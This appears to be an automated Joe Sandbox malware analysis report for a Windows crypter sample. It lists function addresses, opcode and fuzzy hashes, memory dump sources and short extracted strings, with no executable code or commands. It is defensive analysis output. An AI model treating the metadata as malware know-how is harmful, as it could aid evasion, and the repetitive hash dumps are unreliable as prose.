Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f36e1016550d3ea916b8978e8cd0b8b2f5a69c8c5dfe2921dd4f69861fe952b3
Instruction ID: 1612dc3ea3c288fe824380deeedf6a81577c42e6e00a8fc061a246248019380d
Opcode Fuzzy Hash: f36e1016550d3ea916b8978e8cd0b8b2f5a69c8c5dfe2921dd4f69861fe952b3
Instruction Fuzzy Hash: DDD09EB5224A15DFC314CB64C5A4D78BB7BFF4E606B015599E40E57311CB35D841CF24

Function 052D8D18 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6a0135c8e4114be762e2da773b8b5ba6200746516a21a1d9715650588adc763
Instruction ID: fbe57fb067637d0fdbbf9d9e72574be1d314d76c5f59c5146a6aba7cf97d4876
Opcode Fuzzy Hash: d6a0135c8e4114be762e2da773b8b5ba6200746516a21a1d9715650588adc763
Instruction Fuzzy Hash: 39C0922A12094C7AE1417152CDCEF7BB81CDB74B48F4852247A4454150C12AAD28A67A

Function 052D58F0 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe8b57b02c5033c5d68843d50cb20abf8a8d3a4289acc40a1e3c571395dfb306
Instruction ID: d5e48602ea7b23b61c0a73f21ad25707ac316f658c3d7987b40e7aefd525cb60
Opcode Fuzzy Hash: fe8b57b02c5033c5d68843d50cb20abf8a8d3a4289acc40a1e3c571395dfb306
Instruction Fuzzy Hash: 87C01236280208AFDA80AA94C800D66B76DAB48610FA09000BA080A261C672F9629BA1

Function 052DB688 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64a3efd7ec77173aa41c661809ec7b911c42e67b84a7e93f2df2a392050bfa81
Instruction ID: c0e60bbe10fe925a030777ea5cedaf3d167962e3346191e869e043aaded7200c
Opcode Fuzzy Hash: 64a3efd7ec77173aa41c661809ec7b911c42e67b84a7e93f2df2a392050bfa81
Instruction Fuzzy Hash: 17C08CB002020CA7C7242794B82E338BFA9AB09302F402310B04D040608F711014CEA6

Function 052D4970 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d4d0932c69d90bb2599d39434ff9b15e1e5c3a9c7a32c706a7c8612df06238b0
Instruction ID: 84f87ebdfca21a198ad0aa4205fc6a7896969085acf3ca3091849d6cfb0feb72
Opcode Fuzzy Hash: d4d0932c69d90bb2599d39434ff9b15e1e5c3a9c7a32c706a7c8612df06238b0
Instruction Fuzzy Hash: A0C00232184108BBCB426A81D805E59BF2AAB55694F648055F7040D161E673E663AB91

Function 052D4B58 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b04fb54efa360fa7817293b46508b357093532367c56dc53483bcdfe38a28044
Instruction ID: 599b44d4eb80e5f27116fccf205f4336ba3e54164c371a56b9de4d39e04374fe
Opcode Fuzzy Hash: b04fb54efa360fa7817293b46508b357093532367c56dc53483bcdfe38a28044
Instruction Fuzzy Hash: 5FC09B7E1355019E8A11F754C584D25FFE1FFB9300741CC5661C545030C776D418DF55

Function 052D7224 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 356931ae217a717825aa5ac78616a90f9e790628ab04dd36a66a8764c9f230e7
Instruction ID: ee28a4a138a7de80057cc9356ac582e4c18efb1a140a08eb78300d0f933cbf5f
Opcode Fuzzy Hash: 356931ae217a717825aa5ac78616a90f9e790628ab04dd36a66a8764c9f230e7
Instruction Fuzzy Hash: 44B012792B4644A18005727549C8B3FD891EFB5701B50EC16368910050C5744424D63B

Function 052D2DD0 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 516031499f3cbc18851cabdfc373d968f2592e2971bdc1e300e0b7810e7fcf95
Instruction ID: 691254819364e2c2dcec7d260b8411071de17f0879947635ecdb90edd4a7328b
Opcode Fuzzy Hash: 516031499f3cbc18851cabdfc373d968f2592e2971bdc1e300e0b7810e7fcf95
Instruction Fuzzy Hash:

Non-executed Functions

Function 07836F10 Relevance: .4, Instructions: 396COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 280dc1b1b078c5829e593ed9f2de188afba4dddc8091696bcae50c24d684275a
Instruction ID: 909dc3aa48fbd5c1b6a6668b7f528c6337b38777662bb23d89e7757dc9a31599
Opcode Fuzzy Hash: 280dc1b1b078c5829e593ed9f2de188afba4dddc8091696bcae50c24d684275a
Instruction Fuzzy Hash: 4BE16CF17016069FDB29EB7DC490BAE77E6EF99200F14846AD54ACB290DF35D802CB91

Function 052DFB40 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1fe8b31aaf5b4c3d956d891501fa8115d7f7eb1853189bccc43aff22e3d3905b
Instruction ID: 27f38ccf70f433c224e152e44db760d2640a6bb5e2cd853cfc31b4f0914dc66c
Opcode Fuzzy Hash: 1fe8b31aaf5b4c3d956d891501fa8115d7f7eb1853189bccc43aff22e3d3905b
Instruction Fuzzy Hash: 09E10B74E102599FCB14DFA8C5809AEFBB2FF89304F24C169E819AB355D730A941CF64

Function 07830478 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b6643bdfb86db7d9890b4716adb7167860761e592c14989ce235bf5eb20d35
Instruction ID: 5d0ad2c6879de713ee70588c7b97bfeab836b5f917c875c364f70b6f41676a76
Opcode Fuzzy Hash: c9b6643bdfb86db7d9890b4716adb7167860761e592c14989ce235bf5eb20d35
Instruction Fuzzy Hash: 50E1EAB4E102199FCB14DFA9C5909AEFBF2FF89305F248169E414AB359D731A941CFA0

Function 07831C78 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c39128fdacdbf5601a301a800002559f7b197cc68459c575e89fd3eb69c4f54
Instruction ID: 1f68ac2e0ccd659f884585390aa55800f9b2ca035a96d204ab22cee9d489b4c1
Opcode Fuzzy Hash: 3c39128fdacdbf5601a301a800002559f7b197cc68459c575e89fd3eb69c4f54
Instruction Fuzzy Hash: A1E1DAB4E106198FCB14DFA9C5949AEFBB2FF89304F248169E414AB355D731A942CFA0

Function 078320B0 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4090502de946df17893718e2aa19ba3bea9ba8d39bb2cd2e097f7d9a3c93628
Instruction ID: 788daee516b87a5694f4c4ca880ba50b50dff77803f463b2bda63dc10ac2a31f
Opcode Fuzzy Hash: a4090502de946df17893718e2aa19ba3bea9ba8d39bb2cd2e097f7d9a3c93628
Instruction Fuzzy Hash: 64E1EAB4E102199FDB14DFA9C5909AEFBB2FF89304F24C169E414AB355D730A942CFA1

Function 07830040 Relevance: .3, Instructions: 312COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a22ae329d61001dba7053f84da4adc39ec0dcf6e57e357776eac5d60fa421e5
Instruction ID: 3c6edb46948e3a857a1567a77d227e210fbb00264b4f3563a6d2d36c44470326
Opcode Fuzzy Hash: 3a22ae329d61001dba7053f84da4adc39ec0dcf6e57e357776eac5d60fa421e5
Instruction Fuzzy Hash: D1E1EAB4E102198FDB14DF99C5909AEFBF2FF89304F248169E414AB355D730A942CFA1

Function 052D7710 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eecab9aaeeefd42fcb7c397925e25e320777e77e5e1b317025d24eb84f75eda
Instruction ID: c6abe9ddaeb4b395c7f244e683892ada882dd988e225c6e8ff2332754856f73d
Opcode Fuzzy Hash: 6eecab9aaeeefd42fcb7c397925e25e320777e77e5e1b317025d24eb84f75eda
Instruction Fuzzy Hash: EED1293182075ADACB10EF64D994AADB7B1FF95300F10DB9AE40937215FB706AC9CB91

Function 052D7720 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 494f76207bce770248a2cb7aa4123bd716ba535603da8ddae98e9bf8b965bb9b
Instruction ID: 256094f7b96eb26312a926c09cfbba2dd9b08305c8061fdb5e2a2bfed2489c49
Opcode Fuzzy Hash: 494f76207bce770248a2cb7aa4123bd716ba535603da8ddae98e9bf8b965bb9b
Instruction Fuzzy Hash: 95D1293182075ADACB10EF64D994AADB7B1FF95300F10DB9AE40937215FB706AC9CB91

Function 0128DA4C Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1736550354.0000000001280000.00000040.00000800.00020000.00000000.sdmp, Offset: 01280000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1280000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a5101b7329220c020f857099cb7bb73d33699d64834b85e15a9d8072be43a1d
Instruction ID: b39b9d5b0b9f056d64e3af7b4b8131fb8e3b3ffdbe0e4754b7026e77f0ff725b
Opcode Fuzzy Hash: 9a5101b7329220c020f857099cb7bb73d33699d64834b85e15a9d8072be43a1d
Instruction Fuzzy Hash: A5A19332E1120ACFCF05EFB8D9405AEB7B2FF84300B25856AE905BB295DB71E915CB40

Function 078320A0 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1743750170.0000000007830000.00000040.00000800.00020000.00000000.sdmp, Offset: 07830000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7830000_SecuriteInfo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ce99c628c9e2bddf06ee978b6d52a15a72bc27401fb7a3204197a3e257b0339
Instruction ID: cf21245d35789755aae3629e6e0beb55680b0999e4d7a4191b90b0e5d2b99ece
Opcode Fuzzy Hash: 5ce99c628c9e2bddf06ee978b6d52a15a72bc27401fb7a3204197a3e257b0339
Instruction Fuzzy Hash: 1C51DCB5E142198FDB14DFA9C9805AEFBF2BF89304F24C169D418AB315D7319942CFA1

Function 052D1CE0 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

4'^q, xrefs: 052D1F7E
4'^q, xrefs: 052D1FC4
4'^q, xrefs: 052D1FE7
4'^q, xrefs: 052D1F15
4'^q, xrefs: 052D1FA1
4'^q, xrefs: 052D1F5B
4'^q, xrefs: 052D1F38

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-3435395042
Opcode ID: 29a2f7d595522f42e35b2f9e8cd2a526dae928b80d336a5f82c0bdecc02d8d1b
Instruction ID: bd4396b9d91a438d0f1c987fec19c1fc5afd3771c7d000f12a46c1b2e18cd0be
Opcode Fuzzy Hash: 29a2f7d595522f42e35b2f9e8cd2a526dae928b80d336a5f82c0bdecc02d8d1b
Instruction Fuzzy Hash: DCC18035A002059FDB05EF69E5947ADBBB2FF48304F008568E50AEB395DF35A986CB60

Function 052D1EE0 Relevance: 8.9, Strings: 7, Instructions: 166COMMON

Download Yara Rule

Strings

4'^q, xrefs: 052D1F7E
4'^q, xrefs: 052D1FC4
4'^q, xrefs: 052D1FE7
4'^q, xrefs: 052D1F15
4'^q, xrefs: 052D1FA1
4'^q, xrefs: 052D1F5B
4'^q, xrefs: 052D1F38

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-3435395042
Opcode ID: 0e1139339779e2672706990a373fb3d76de48df0609b40b10b6042169db9ff95
Instruction ID: c3b21933c9e04cfc668d953f169e904fdbcb88fbf0a996a03355e2850ff68fb0
Opcode Fuzzy Hash: 0e1139339779e2672706990a373fb3d76de48df0609b40b10b6042169db9ff95
Instruction Fuzzy Hash: C271D675A00205DFDB04EF6AE591B9D7BF1FF48308F008564E509AB35ADB35A986CB60

Function 052D0006 Relevance: 7.6, Strings: 6, Instructions: 115COMMON

Download Yara Rule

Strings

4'^q, xrefs: 052D010D
4'^q, xrefs: 052D0176
4'^q, xrefs: 052D0153
4'^q, xrefs: 052D0130
4'^q, xrefs: 052D0199
4'^q, xrefs: 052D01BC

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-2822668367
Opcode ID: a26846b8b92b77b1b924ee4788379f4efaa87b8108a391a0e95f877d3622a44e
Instruction ID: 548853a6e665f6cc8c13b6bcd2cdbe533e1091fd4f89e17f19a379f8d7e6a7a0
Opcode Fuzzy Hash: a26846b8b92b77b1b924ee4788379f4efaa87b8108a391a0e95f877d3622a44e
Instruction Fuzzy Hash: 9851F370D0124A8FC708EF75EC5166E7BF2FF41300BC28AA9D005AB2A9EF712945CB91

Function 052D0040 Relevance: 7.6, Strings: 6, Instructions: 95COMMON

Download Yara Rule

Strings

4'^q, xrefs: 052D010D
4'^q, xrefs: 052D0176
4'^q, xrefs: 052D0153
4'^q, xrefs: 052D0130
4'^q, xrefs: 052D0199
4'^q, xrefs: 052D01BC

Memory Dump Source

Source File: 00000000.00000002.1740737302.00000000052D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52d0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
API String ID: 0-2822668367
Opcode ID: 088ea58bb8c862663145be975eed1fdc36e3489639a9b52580b2db21fb103424
Instruction ID: 621ef6ccf9d778cd1015d768f2a2b32b1513f128fd25bffeb08d1d7e443d5875
Opcode Fuzzy Hash: 088ea58bb8c862663145be975eed1fdc36e3489639a9b52580b2db21fb103424
Instruction Fuzzy Hash: 11415370D4121A8FCB08EF75E8516AE77F2FB443407C18AA9D009AB3A8EF712955CF91

Analysis Process: SecuriteInfo.com.Win32.CrypterX-gen.1497.25511.exePID: 7472, Parent PID: 7252COMMON

Executed Functions

Function 00EC5362 Relevance: 6.4, Strings: 5, Instructions: 195COMMON

Download Yara Rule

Strings

PH^q, xrefs: 00EC55D9
LjAp, xrefs: 00EC5566
PH^q, xrefs: 00EC55C8
0oAp, xrefs: 00EC53E2
LjAp, xrefs: 00EC5550

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: dbbe521a91eea72f297f2c3126458f259de51c594f8553930ba0f5c5904ffe33
Instruction ID: 506283160498e2317e1957f010d727baff7be73f4382cab31fb93525c3a7b5d5
Opcode Fuzzy Hash: dbbe521a91eea72f297f2c3126458f259de51c594f8553930ba0f5c5904ffe33
Instruction Fuzzy Hash: 9D910674D00618CFDB14CFA9D984A9DBBF2BF88300F149069E409BB365DB31A985CF10

Function 00ECC468 Relevance: 6.4, Strings: 5, Instructions: 189COMMON

Download Yara Rule

Strings

PH^q, xrefs: 00ECC6D0
LjAp, xrefs: 00ECC65D
0oAp, xrefs: 00ECC4DA
LjAp, xrefs: 00ECC647
PH^q, xrefs: 00ECC6BF

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: d0402687bd05605995507a21e38fc500795218d26fa15260d454925002bf8e51
Instruction ID: abf671f54e742371c39170b5cbbcac3669d3ce4f36fac17019b6c9c6ce5cc491
Opcode Fuzzy Hash: d0402687bd05605995507a21e38fc500795218d26fa15260d454925002bf8e51
Instruction Fuzzy Hash: 4781B274E00218CFDB14DFAAD984B9DBBF2BF88304F249069E419AB365DB359985CF50

Function 00ECC19C Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

0oAp, xrefs: 00ECC20A
PH^q, xrefs: 00ECC3EF
LjAp, xrefs: 00ECC38D
LjAp, xrefs: 00ECC377
PH^q, xrefs: 00ECC400

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 20def949d6c1f1888f0b5dbc8af64075414e8f94aacd847a690602f6c3e19ae9
Instruction ID: b70017d598605a4939e42073c9c64a6b0016c1da7a7939876776388af50b5c1f
Opcode Fuzzy Hash: 20def949d6c1f1888f0b5dbc8af64075414e8f94aacd847a690602f6c3e19ae9
Instruction Fuzzy Hash: 3181B374E00218CFDB14DFAAD994A9DBBF2BF88304F24D069E419BB265DB319946CF50

Function 00ECCCD8 Relevance: 6.4, Strings: 5, Instructions: 187COMMON

Download Yara Rule

Strings

PH^q, xrefs: 00ECCF2F
LjAp, xrefs: 00ECCECD
LjAp, xrefs: 00ECCEB7
0oAp, xrefs: 00ECCD4A
PH^q, xrefs: 00ECCF40

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 70013c8db3789af232e8a43e64286be2bd499c22ecaade3133703736f42012b3
Instruction ID: f2f736029241b3c8418c8e0f2348bfea722e404213843838252e155a2288f5f0
Opcode Fuzzy Hash: 70013c8db3789af232e8a43e64286be2bd499c22ecaade3133703736f42012b3
Instruction Fuzzy Hash: 2981D474E00208CFDB14DFAAD984A9DBBF2BF89304F249069E409BB365DB355986CF10

Function 00ECD278 Relevance: 6.4, Strings: 5, Instructions: 186COMMON

Download Yara Rule

Strings

LjAp, xrefs: 00ECD46D
LjAp, xrefs: 00ECD457
PH^q, xrefs: 00ECD4E0
0oAp, xrefs: 00ECD2EA
PH^q, xrefs: 00ECD4CF

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 53063b953b6d1382b95966b65e34a82fdd15784c2abdd09ad6785303741c4601
Instruction ID: a01aa5575c6f0fd9c0614fbde966f0b92a3d94178d3863a3094a3f28e93e4178
Opcode Fuzzy Hash: 53063b953b6d1382b95966b65e34a82fdd15784c2abdd09ad6785303741c4601
Instruction Fuzzy Hash: 2681A374E04218CFDB18DFAAD984B9DBBF2BF88304F149069E419AB365DB359985CF10

Function 00ECC738 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

PH^q, xrefs: 00ECC9A0
LjAp, xrefs: 00ECC917
LjAp, xrefs: 00ECC92D
PH^q, xrefs: 00ECC98F
0oAp, xrefs: 00ECC7AA

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 87ff3cf3ec6fd74dacb5483632d060321eaecfc0d6cffd52d134939a9612a999
Instruction ID: 1acb51f63d69627b54642363a66ae0dab10003371f6774d9720f9596d98c374f
Opcode Fuzzy Hash: 87ff3cf3ec6fd74dacb5483632d060321eaecfc0d6cffd52d134939a9612a999
Instruction Fuzzy Hash: A181A174E002188FDB14DFAAD984B9DBBF2BF88304F24D069E419AB365DB315986CF50

Function 00ECCA08 Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

LjAp, xrefs: 00ECCBFD
PH^q, xrefs: 00ECCC70
PH^q, xrefs: 00ECCC5F
0oAp, xrefs: 00ECCA7A
LjAp, xrefs: 00ECCBE7

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 6c9d6e987c77ec5b914259dca3bf41e5db5c6c40d1433103ce8bc0c37e773f5c
Instruction ID: 77f4dabc03dc61466cf2e9efa0cfc15a4ef923d6a58520737b42a6e01d38995d
Opcode Fuzzy Hash: 6c9d6e987c77ec5b914259dca3bf41e5db5c6c40d1433103ce8bc0c37e773f5c
Instruction Fuzzy Hash: 4F81C374E00218CFDB14DFAAD984A9DBBF2BF88304F249069E419BB365DB359985CF50

Function 00ECCFAA Relevance: 6.4, Strings: 5, Instructions: 185COMMON

Download Yara Rule

Strings

PH^q, xrefs: 00ECD210
0oAp, xrefs: 00ECD01A
LjAp, xrefs: 00ECD187
LjAp, xrefs: 00ECD19D
PH^q, xrefs: 00ECD1FF

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: 0oAp$LjAp$LjAp$PH^q$PH^q
API String ID: 0-1487592376
Opcode ID: 8253a35cf6388a7277c9ec79665f2098cc98b6c2ef79b7b07bb6feb4ff7cf511
Instruction ID: be8b39e8afc0ce2385c9c4369ab824af392fb9cdcbd8e2f76be99d16b92481e4
Opcode Fuzzy Hash: 8253a35cf6388a7277c9ec79665f2098cc98b6c2ef79b7b07bb6feb4ff7cf511
Instruction Fuzzy Hash: BA81B374E05218CFDB14DFAAD984A9DBBF2BF88310F149069E409AB365DB359986CF10

Function 00EC6FC8 Relevance: 5.5, Strings: 4, Instructions: 504COMMON

Download Yara Rule

Strings

(o^q, xrefs: 00EC7212
,bq, xrefs: 00EC728A
,bq, xrefs: 00EC7298
(o^q, xrefs: 00EC7220

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$,bq$,bq
API String ID: 0-879173519
Opcode ID: 256ad70afaaccf38c33cbe690567609bdb9b1b9ea142d62e86b90d69ab6c4fac
Instruction ID: 221a0ff819a71122b7497943cb958b9bcc297a144af12f0274b800baea29f84a
Opcode Fuzzy Hash: 256ad70afaaccf38c33cbe690567609bdb9b1b9ea142d62e86b90d69ab6c4fac
Instruction Fuzzy Hash: 73125E70A082159FCB18CF69CA84FADBBF6BF48314F159069E895AB261D732DC42CF51

Function 00ECA088 Relevance: 3.4, Strings: 2, Instructions: 900COMMON

Download Yara Rule

Strings

4'^q, xrefs: 00ECAB13
(o^q, xrefs: 00ECA518

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (o^q$4'^q
API String ID: 0-273632683
Opcode ID: 28848201c5fda56e26325ac719e12297d2d8f39afcd200cbaa7171362c10628b
Instruction ID: 9758138bebef08ad32a70cc81d23bed93bfb56e1d9e1b0556b7e4ab92d992413
Opcode Fuzzy Hash: 28848201c5fda56e26325ac719e12297d2d8f39afcd200cbaa7171362c10628b
Instruction Fuzzy Hash: 30826F35600209DFCB15CFA8C684EAEBBF2FF48318F199569E415AB261D731ED82CB51

Function 00EC69A0 Relevance: 3.0, Strings: 2, Instructions: 517COMMON

Download Yara Rule

Strings

Hbq, xrefs: 00EC6DA6
(o^q, xrefs: 00EC6EDA

Memory Dump Source

Source File: 00000004.00000002.4170563099.0000000000EC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_ec0000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: (o^q$Hbq
API String ID: 0-662517225
Opcode ID: f4b3201ac51986bf369f494f65badcec3f7a7a12b736792b902e5fd08e884255
